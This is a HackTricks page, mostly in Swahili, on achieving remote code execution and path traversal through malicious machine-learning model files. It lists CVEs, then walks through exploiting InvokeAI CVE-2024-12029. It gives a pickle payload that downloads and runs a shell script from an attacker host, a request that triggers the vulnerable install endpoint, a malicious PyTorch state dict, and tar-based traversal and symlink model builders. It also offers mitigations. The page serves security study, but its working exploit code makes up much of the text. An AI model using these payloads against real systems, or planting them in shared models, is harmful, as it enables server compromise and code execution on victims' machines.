HackTricksModels RCE
Reading time: 8 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Loading models to RCE
Modeli za Machine Learning kawaida hushirikiwa katika mifumo tofauti, kama ONNX, TensorFlow, PyTorch, n.k. Hizi modeli zinaweza kupakuliwa kwenye mashine za waendelezaji au mifumo ya uzalishaji ili kuzitumia. Kawaida, modeli hazipaswi kuwa na msimbo mbaya, lakini kuna baadhi ya kesi ambapo modeli inaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo kama kipengele kilichokusudiwa au kwa sababu ya udhaifu katika maktaba ya kupakia modeli.
Wakati wa kuandika, haya ni baadhi ya mifano ya aina hii ya udhaifu:
| Framework / Tool | Vulnerability (CVE if available) | RCE Vector | References |
|---|---|---|---|
| PyTorch (Python) | Insecure deserialization in torch.load (CVE-2025-32434) | Malicious pickle in model checkpoint leads to code execution (bypassing weights_only safeguard) | |
| PyTorch TorchServe | ShellTorch – CVE-2023-43654, CVE-2022-1471 | SSRF + malicious model download causes code execution; Java deserialization RCE in management API | |
| TensorFlow/Keras | CVE-2021-37678 (unsafe YAML) CVE-2024-3660 (Keras Lambda) | Loading model from YAML uses yaml.unsafe_load (code exec) Loading model with Lambda layer runs arbitrary Python code | |
| TensorFlow (TFLite) | CVE-2022-23559 (TFLite parsing) | Crafted .tflite model triggers integer overflow → heap corruption (potential RCE) | |
| Scikit-learn (Python) | CVE-2020-13092 (joblib/pickle) | Loading a model via joblib.load executes pickle with attacker’s __reduce__ payload | |
| NumPy (Python) | CVE-2019-6446 (unsafe np.load) disputed | numpy.load default allowed pickled object arrays – malicious .npy/.npz triggers code exec | |
| ONNX / ONNX Runtime | CVE-2022-25882 (dir traversal) CVE-2024-5187 (tar traversal) | ONNX model’s external-weights path can escape directory (read arbitrary files) Malicious ONNX model tar can overwrite arbitrary files (leading to RCE) | |
| ONNX Runtime (design risk) | (No CVE) ONNX custom ops / control flow | Model with custom operator requires loading attacker’s native code; complex model graphs abuse logic to execute unintended computations | |
| NVIDIA Triton Server | CVE-2023-31036 (path traversal) | Using model-load API with --model-control enabled allows relative path traversal to write files (e.g., overwrite .bashrc for RCE) | |
| GGML (GGUF format) | CVE-2024-25664 … 25668 (multiple heap overflows) | Malformed GGUF model file causes heap buffer overflows in parser, enabling arbitrary code execution on victim system | |
| Keras (older formats) | (No new CVE) Legacy Keras H5 model | Malicious HDF5 (.h5) model with Lambda layer code still executes on load (Keras safe_mode doesn’t cover old format – “downgrade attack”) | |
| Others (general) | Design flaw – Pickle serialization | Many ML tools (e.g., pickle-based model formats, Python pickle.load) will execute arbitrary code embedded in model files unless mitigated |
Zaidi ya hayo, kuna baadhi ya modeli zinazotegemea python pickle kama zile zinazotumiwa na PyTorch ambazo zinaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo ikiwa hazijapakiwa na weights_only=True. Hivyo, modeli yoyote inayotegemea pickle inaweza kuwa na hatari maalum kwa aina hii ya mashambulizi, hata kama hazijatajwa kwenye jedwali hapo juu.
🆕 InvokeAI RCE via torch.load (CVE-2024-12029)
InvokeAI ni kiolesura maarufu cha wavuti cha chanzo wazi kwa Stable-Diffusion. Matoleo 5.3.1 – 5.4.2 yanaonyesha mwisho wa REST /api/v2/models/install ambao unaruhusu watumiaji kupakua na kupakia modeli kutoka URL za kiholela.
Ndani, mwisho huu hatimaye unaita:
checkpoint = torch.load(path, map_location=torch.device("meta"))
Wakati faili iliyotolewa ni PyTorch checkpoint (*.ckpt), torch.load inafanya pickle deserialization. Kwa sababu maudhui yanatoka moja kwa moja kwenye URL inayodhibitiwa na mtumiaji, mshambuliaji anaweza kuingiza kitu kibaya chenye njia ya __reduce__ iliyobinafsishwa ndani ya checkpoint; njia hiyo inatekelezwa wakati wa deserialization, ikisababisha remote code execution (RCE) kwenye seva ya InvokeAI.
Uthibitisho wa udhaifu ulipatiwa CVE-2024-12029 (CVSS 9.8, EPSS 61.17 %).
Mwongozo wa unyakuzi
- Tengeneza checkpoint mbaya:
# payload_gen.py
import pickle, torch, os
class Payload:
def __reduce__(self):
return (os.system, ("/bin/bash -c 'curl http://ATTACKER/pwn.sh|bash'",))
with open("payload.ckpt", "wb") as f:
pickle.dump(Payload(), f)
- Kuweka
payload.ckptkwenye seva ya HTTP unayodhibiti (mfanohttp://ATTACKER/payload.ckpt). - Chochea kiunganishi kilichohatarishwa (hakuna uthibitisho unaohitajika):
import requests
requests.post(
"http://TARGET:9090/api/v2/models/install",
params={
"source": "http://ATTACKER/payload.ckpt", # remote model URL
"inplace": "true", # write inside models dir
# the dangerous default is scan=false → no AV scan
},
json={}, # body can be empty
timeout=5,
)
- Wakati InvokeAI inaposhusha faili inaita
torch.load()→ gadget yaos.systeminakimbia na mshambuliaji anapata utekelezaji wa msimbo katika muktadha wa mchakato wa InvokeAI.
Ready-made exploit: Metasploit module exploit/linux/http/invokeai_rce_cve_2024_12029 inafanya mchakato mzima kuwa wa kiotomatiki.
Masharti
• InvokeAI 5.3.1-5.4.2 (bendera ya skana ya kawaida false)
• /api/v2/models/install inapatikana na mshambuliaji
• Mchakato una ruhusa za kutekeleza amri za shell
Mipango ya Kuzuia
- Pandisha hadi InvokeAI ≥ 5.4.3 – patch inafanya
scan=Truekuwa ya kawaida na inafanya uchunguzi wa malware kabla ya deserialization. - Wakati wa kupakia checkpoints kwa njia ya programu tumia
torch.load(file, weights_only=True)autorch.load_safemsaidizi mpya. - Lazimisha orodha za ruhusa / saini za vyanzo vya modeli na uendeshe huduma kwa kiwango cha chini cha ruhusa.
⚠️ Kumbuka kwamba aina yoyote ya muundo wa Python pickle (ikiwemo faili nyingi za
.pt,.pkl,.ckpt,.pth) kwa asili si salama kutekeleza kutoka vyanzo visivyoaminika.
Mfano wa mipango ya kuzuia ya ad-hoc ikiwa lazima uendelee kutumia toleo la zamani la InvokeAI nyuma ya proxy ya kurudi:
location /api/v2/models/install {
deny all; # block direct Internet access
allow 10.0.0.0/8; # only internal CI network can call it
}
Mfano – kuunda mfano mbaya wa PyTorch
- Unda mfano:
# attacker_payload.py
import torch
import os
class MaliciousPayload:
def __reduce__(self):
# This code will be executed when unpickled (e.g., on model.load_state_dict)
return (os.system, ("echo 'You have been hacked!' > /tmp/pwned.txt",))
# Create a fake model state dict with malicious content
malicious_state = {"fc.weight": MaliciousPayload()}
# Save the malicious state dict
torch.save(malicious_state, "malicious_state.pth")
- Pakia mfano:
# victim_load.py
import torch
import torch.nn as nn
class MyModel(nn.Module):
def __init__(self):
super().__init__()
self.fc = nn.Linear(10, 1)
model = MyModel()
# ⚠️ This will trigger code execution from pickle inside the .pth file
model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
# /tmp/pwned.txt is created even if you get an error
Models to Path Traversal
Kama ilivyoelezwa katika hiki blogu, mifano mingi inayotumika na mifumo tofauti ya AI inategemea archives, mara nyingi .zip. Hivyo, inaweza kuwa inawezekana kutumia mifano hii kufanya mashambulizi ya path traversal, kuruhusu kusoma faili za kawaida kutoka kwenye mfumo ambapo mfano umewekwa.
Kwa mfano, kwa kutumia msimbo ufuatao unaweza kuunda mfano ambao utaunda faili katika saraka ya /tmp wakati unapo load:
import tarfile
def escape(member):
member.name = "../../tmp/hacked" # break out of the extract dir
return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
tf.add("harmless.txt", filter=escape)
Au, kwa kutumia msimbo ufuatao unaweza kuunda mfano ambao utaunda symlink kwa saraka ya /tmp wakati inapo load:
import tarfile, pathlib
TARGET = "/tmp" # where the payload will land
PAYLOAD = "abc/hacked"
def link_it(member):
member.type, member.linkname = tarfile.SYMTYPE, TARGET
return member
with tarfile.open("symlink_demo.model", "w:gz") as tf:
tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
tf.add(PAYLOAD) # rides the symlink
Deep-dive: Keras .keras deserialization and gadget hunting
Kwa mwongozo wa kina kuhusu .keras ndani, Lambda-layer RCE, suala la kuagiza bila mpangilio katika ≤ 3.8, na ugunduzi wa gadget baada ya kurekebisha ndani ya orodha ya ruhusa, angalia:
Keras Model Deserialization Rce And Gadget Hunting
References
- OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"
- InvokeAI patch commit 756008d
- Rapid7 Metasploit module documentation
- PyTorch – security considerations for torch.load
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.